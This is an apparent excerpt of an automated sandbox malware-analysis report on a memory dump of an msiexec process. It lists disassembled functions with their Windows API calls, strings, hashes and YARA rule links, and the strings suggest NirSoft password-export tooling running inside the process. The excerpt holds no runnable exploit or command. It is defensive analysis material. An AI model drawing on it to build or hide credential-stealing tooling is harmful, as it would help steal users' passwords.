                                                                                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                        Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • malloc.MSVCRT ref: 004186B7
                                                                                                        • free.MSVCRT ref: 004186C7
                                                                                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                        • free.MSVCRT ref: 004186E0
                                                                                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                        • malloc.MSVCRT ref: 004186FE
                                                                                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                        • free.MSVCRT ref: 00418716
                                                                                                        • free.MSVCRT ref: 0041872A
                                                                                                        • free.MSVCRT ref: 00418749
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$FullNamePath$malloc$Version
                                                                                                        • String ID: |A
                                                                                                        • API String ID: 3356672799-1717621600
                                                                                                        • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                        • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                        Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp
                                                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                        • API String ID: 2081463915-1959339147
                                                                                                        • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                        • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                        Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 2012295524-70141382
                                                                                                        • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                        • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                        Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                        • API String ID: 667068680-3953557276
                                                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                        Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1700100422-0
                                                                                                        • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                        • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                        Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 552707033-0
                                                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                        Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf
                                                                                                        • String ID: %%0.%df
                                                                                                        • API String ID: 3473751417-763548558
                                                                                                        • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                        • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                        Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                        • GetParent.USER32(?), ref: 00406136
                                                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                        • String ID: A
                                                                                                        • API String ID: 2892645895-3554254475
                                                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                        Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                        • memset.MSVCRT ref: 0040DA23
                                                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                        • String ID: caption
                                                                                                        • API String ID: 973020956-4135340389
                                                                                                        • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                        • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                        Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                        • API String ID: 1283228442-2366825230
                                                                                                        • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                        • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                        Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00413972
                                                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                                                        • memset.MSVCRT ref: 004139B8
                                                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                        • memset.MSVCRT ref: 00413A00
                                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                        • String ID: \systemroot
                                                                                                        • API String ID: 4173585201-1821301763
                                                                                                        • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                        • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                        Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy
                                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                        • API String ID: 1284135714-318151290
                                                                                                        • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                        • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                        • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                        • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                        Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                        • strchr.MSVCRT ref: 0040C140
                                                                                                        • strchr.MSVCRT ref: 0040C151
                                                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                                                        • memset.MSVCRT ref: 0040C17A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                        • String ID: 4$h
                                                                                                        • API String ID: 4019544885-1856150674
                                                                                                        • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                        • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                        Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 4066108131-3849865405
                                                                                                        • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                        • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                        Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004082EF
                                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                        • memset.MSVCRT ref: 00408362
                                                                                                        • memset.MSVCRT ref: 00408377
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 290601579-0
                                                                                                        • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                        • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                        Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memchr.MSVCRT ref: 00444EBF
                                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                        • memset.MSVCRT ref: 0044505E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memchrmemset
                                                                                                        • String ID: PD$PD
                                                                                                        • API String ID: 1581201632-2312785699
                                                                                                        • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                        • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                        • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                        • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                        Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                        • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
